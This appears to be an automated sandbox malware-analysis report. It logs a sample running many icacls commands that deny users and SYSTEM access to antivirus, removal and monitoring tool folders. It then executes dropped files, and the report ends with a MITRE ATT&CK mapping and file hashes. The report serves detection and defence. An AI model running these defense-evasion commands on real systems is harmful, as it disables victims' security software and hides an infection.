C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "Admin":(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\AutoLogger" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Downloads\AutoLogger" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Bitdefender Agent" /deny "Admin":(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\DrWeb" /deny "Admin":(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\Doctor Web" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\AV" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny "Admin":(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\grizzly" /deny "Admin":(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Cezurity" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\McAfee" /deny "Admin":(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\McAfee" /deny "Admin":(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Rainmeter" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "c:\program files\Rainmeter" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Loaris Trojan Remover" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "c:\program files\Loaris Trojan Remover" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Avira" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\ESET" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Process Lasso" /deny "Admin":(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Ravantivirus" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Evernote" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\WavePad" /deny "Admin":(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\RobotDemo" /deny "Admin":(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\PuzzleMedia" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\ESET" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\FingerPrint" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\BookManager" /deny "Admin":(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Panda Security" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\Transmission" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "c:\Program Files (x86)\Transmission" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\Program Files\Transmission" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "c:\Program Files\Transmission" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Hacker 2" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Process Hacker 2" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\princeton-produce" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\princeton-produce" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\EnigmaSoft" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\EnigmaSoft" /deny "Admin":(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\SUPERAntiSpyware" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "c:\program files\SUPERAntiSpyware" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\PROGRAM FILES\RogueKiller" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\PROGRAM FILES\RogueKiller" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Moo0" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Moo0" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpeedFan" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\SpeedFan" /deny "Admin":(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GPU Temp" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\GPU Temp" /deny "Admin":(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\CPUID\HWMonitor" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\CPUID\HWMonitor" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\MSI\MSI Center" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\MSI\MSI Center" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\QuickCPU" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\QuickCPU" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\NETGATE" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "c:\program files\NETGATE" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\Programs\transmission /deny %username%:(OI)(CI)F4⤵
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Programs\transmission /deny Admin:(OI)(CI)F5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny %username%:(OI)(CI)F4⤵
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny Admin:(OI)(CI)F5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor /deny %username%:(OI)(CI)F4⤵
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor /deny Admin:(OI)(CI)F5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\Del3.bat4⤵
-
C:\Windows\system32\timeout.exetimeout 55⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
2Winlogon Helper DLL
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Privilege Escalation
Account Manipulation
1Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
2Winlogon Helper DLL
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
4Disable or Modify System Firewall
1Disable or Modify Tools
2Modify Registry
5Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
126.3MB
MD5a8680bb1720aaf1e99752b02f082f58b
SHA17a101fd5b60fd696302938b3b7fdd9ee6ace8ea2
SHA25658ac22a286cae5b293ff5ebb87f06ec106e0b2c0ae0318e7c5faa5e329b210ce
SHA51237d5feb3c343eafdff745b1754571d4e36e3e059ca1fec82b1654aea341f8d84545273380bc0fa2f9ea4121b709744a60b6c3169da2a64cd982fcd4abb753919
-
Filesize
1.4MB
MD53288c284561055044c489567fd630ac2
SHA111ffeabbe42159e1365aa82463d8690c845ce7b7
SHA256ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753
SHA512c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02
-
Filesize
8.1MB
MD5b0751c16c730f13448a8829eb16f8700
SHA1fff7ed4c0044ebde6ebdf809959a2231a003bd45
SHA256a0a019b7861028aee18c7088c6ecd19de2f46852118bb09115a4b57e7a3cff34
SHA512abe47fef67ab1156daf7afbaa9212597831c567e0a0924890695c3a4449182ddd59d2cfab9d2278fb1b0fccdcb81effd791f9d8c023056546004eb899c5b0c26
-
Filesize
53.0MB
MD5a508fafb5707c6c99264e52e2d1fbdff
SHA1670dd552c5dfc4ab66e8ee2d280301b6f7d58eb3
SHA25690b0f508e2f9c1221a72a7cb731c574790c3dc90e88b469fe6a2c590cdbe98d4
SHA51215b4b20297202b31c0c7ad4491ff0043f943b22bab1a37d0aebed80f2a53436b63c4397860046117bcb8353f794dd61eafe9383be25824e9180fe3627b992604
-
Filesize
6.6MB
MD5ba1fc250e9260dd77270c8ad02e6c9d3
SHA182f9498fb4d9e51385912cd6837005caaaf59c97
SHA2564bfc4e3ef60c89fefdf173ece3d3e6e969cb0ba3d17f350778522fa5a7cbd89f
SHA512f2f1725962599512d77e98f27d78b3d3a6803aa5f0828a3f79fa18a7313c903d81bd3b88e7b6ce8ccd63e88fe3ecc4d436faa50e298dba480707c6ec55a9c62c
-
Filesize
20.2MB
MD5e72253d9c42192ba62b5e2552bbfbca4
SHA1065af9ed0ec5d6d4b40c6dcf76e847b98b2572d2
SHA2562208dc3c8ca0aa3456e5f562b8f338be4bdc5270a488a9e44e5c4f6a972a792d
SHA512155879bbc185ce9df1b62f9ff9e0147cf99d5514004e92b8812bcec76783ad958dfaaf73ed6ddca99f2b942605a3b0a07156e12a1342241ad780d178a5074f4f
-
Filesize
240.4MB
MD59314b47fefaad03cfff812f81b8842ba
SHA19774516344f22c3f41bc0c2973b4d2f2455b3b04
SHA256cef9fc96c36dbaef8c7fa65e3cc006f751e093e0cbcd3774b6d5185f55ff6720
SHA512dc941e986ba495833a26739502a2c73b3469509a8bd291f80f76348837e1fd158d0e2f89b5fc31e36eefbbf30ae159dbdf6b4351bffe91966d24c96db1183c19
-
Filesize
9.2MB
MD553b92442e012db2fc2ee7dc22ee932a9
SHA1750d3f0ac227ccaa2c2a86859cffa4a2ac7cb1d1
SHA256776217117d4b2ecdb07b8a182581e4fd562c0a5785340f86100cf5c1b4eff62e
SHA512b64301d65f48f76855ad89723a933f6e25478ae3a5bcc35cbef81badd08d6dc565d41b51b46a9ab1ad750f0dfa81bffc3c4e6b3b5708f49fd937c948d674c430
-
Filesize
29.6MB
MD5b5cf5d6f9bd5c5ef5b3b47943fdd0ab7
SHA15b161fc632325c6099a5f75b8b443028c04aa7ad
SHA256fe7910a29e1f90c8a4ee316fdaa99c9927db552bda76fb4ead6a2baf3965a061
SHA5125cfb6e8e3da5dba2607ee09868ae928485886e4a88248197a7817127f518270eec837581da3750a57cb6d2622f0465dd98c10558fe4f9b3e7f605fdd669c4b27
-
Filesize
9.4MB
MD5b387033981170463dd910b0c85ffb7f0
SHA128c6c372e4a903436f31137d52aa9f50fb0e2109
SHA256920ab94779ff20407d50f12770eff6f4a89206db4704a3bcc7e5abc23fb6243e
SHA5125b5929c6a3555c87e5027c479446eeed8ead0a86a03e19efc937bc315391a0a724b5afed3e44e50f755603c2d66179bf8d0a8e89da4c31b4d531f9ddcaa81330
-
Filesize
163.1MB
MD57341525643146052ae0feeb19fcafe5e
SHA11a7ee34099d7634c312f2d5b043d35eb6ce720ca
SHA2569a0335f6bdf005c960a20d350f29913ebd94bc96a26e3fd14ced56e6a3eb7b05
SHA512683848583aa9d553c79b5405920a524ea068e8bcef4da4fdb201b4ac9d0853325bb85d5d6760542e8f1661a8400b52643b9e8d56c2e9a7252aa8cd879d206826
-
Filesize
2KB
MD5d7c429c3e48b1edb695c9b661154d32e
SHA1e1397f226ebdd7f39fe800b4161066b4941e79b0
SHA2569a5e1ea29b6c7d101d133f9e5951d42af3c14c2222ec8883601040ff37fc4bd3
SHA512abb0c8207a19c81463d95f795e0795b63848f3eb8038f1ae3f1a0d3b9854694ffa11febe64f62d1de6d23ea60df18b92a974148e97411287b2d9c0fc5a79d225
-
Filesize
10.2MB
MD53f4f5a6cb95047fea6102bd7d2226aa9
SHA1fc09dd898b6e7ff546e4a7517a715928fbafc297
SHA25699fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98
SHA512de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688
-
Filesize
217B
MD5fb369c6af5023aff988430d0c66b7d53
SHA18c7395e08476c5b26a17acb1d0c6cff80bc4024a
SHA25609d17906e4af64f008c7f0136ad1609467925bc5b9a2adf67c806b95fd7a7302
SHA512419d97314c76ddfaf826ba4ecf52932e5f93c97d99b7286ab71477cef3d7c37cb91d6d7c528d4caca465e42a2471b7022259e969e8ca96c63c76f043ab425ed9
-
Filesize
3KB
MD5dc9fa52171eb0944c00164c6a046cb58
SHA1b55cbc8422b4cc006fe47675b7d1b67cc02657e8
SHA256c46aadd00d3a7b81a3910703cd109b86ec1d52cc08493a9d3ac757ec55046010
SHA51282009d261a17c34f4652d1d383fff12ce0761fe8d7483cee20183c983bc01e947d1d2af97642476b23eb48485121adddfe9ad3319ceec3f0726826885a0de7fd
-
Filesize
100.0MB
MD5ff6a31844637ffb384e20d2a2aba0b63
SHA151c1b62e10358fb1a0cc4904fd35a521373ce8c9
SHA256f993de8c7062c78b2a2be059069c8543dc4fe27ec288a621be0d9807adecf687
SHA5126ac68041344ebcf189ac52039cce4b43eb7ad7c96908ac833bfd7875f09eae655bf1814eebbbcd47b9d0fc39ce1c4d8d2e99c945d9c644e78c93dd8964352226
-
Filesize
73B
MD5a7156985a69a520857d07818b2161bec
SHA14ca34541f48f4811aaba2a49d63a7b76bf7ba05e
SHA256bb4810e0f1e95012705f20e78fdc63a57917a9f3d848520e4f3f2a7975dbdbe9
SHA5125a46596f08a32b246573e24896b1407d4b747eef9722a45be20084d50939cf2d9417793e3a83e7edd91587cfbda1074a9ea7539a73b6f991b233210ca638247b
-
Filesize
13.0MB
MD5f41ac8c7f6f7871848ddb6fb718a15bb
SHA1bce00d05c76d0a4eedbd76c2e87fc55c644edac0
SHA256d30a26d6f6676d700f86db8ff522cccfea285e1272f2dba210cf99c3b676a773
SHA51262316becb846b12396401fdb79c14ada97495abdd241fe4815c963d6ea315989bc6f283ff68c17cd90e5b62d3ea025770f4883b2b1f387d0dbe2d41a1c541ba6
-
Filesize
3KB
MD5dda38d0a02ece7d747afcd3085fd9515
SHA17d8fc89118bdc417a1c57a6f59b538449248de99
SHA2569778603aa4a32103bd3ab43c46fd9d55674487de857a560bcda0e6661299dae0
SHA512d208692ea314ff5d396097fae1d10464c631d2b91e0f45de3758da0d462b44cca89b67d89f8f346df805d081b116d81f01e983c45606bf0e91ec3de8ddde7c30
-
Filesize
114KB
MD5461ade40b800ae80a40985594e1ac236
SHA1b3892eef846c044a2b0785d54a432b3e93a968c8
SHA256798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
SHA512421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26
-
Filesize
323KB
MD574353b471791f5d75f64bd0bf051b0e9
SHA1272ba026a029da8a356f4f1de596d09125895312
SHA256e33f6ea2f4e7ea1cf7ae5550eb0d2f4df3a8d7a77ca59b03219bab5a6d3021e9
